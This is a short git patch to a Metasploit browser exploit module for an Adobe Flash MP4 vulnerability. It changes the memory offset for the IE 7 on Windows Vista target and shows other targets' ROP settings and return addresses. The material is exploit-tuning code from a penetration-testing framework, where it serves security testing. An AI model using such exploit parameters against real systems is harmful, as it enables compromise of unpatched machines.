From 5b566b43b4c23fb29398895e8c12749de1fbb368 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <todb@metasploit.com>
Date: Thu, 8 Mar 2012 12:08:39 -0600
Subject: [PATCH] Catching an update from @hdmoore-r7

wrt the nuclear option.
---
 modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
index db08e1f787..ed05b425e7 100644
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ],
 					[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ],
 					[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre,    'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ],
-					[ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ]
+					[ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x600', 'Ret' => 0x0c0c0c0c } ]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Feb 15 2012",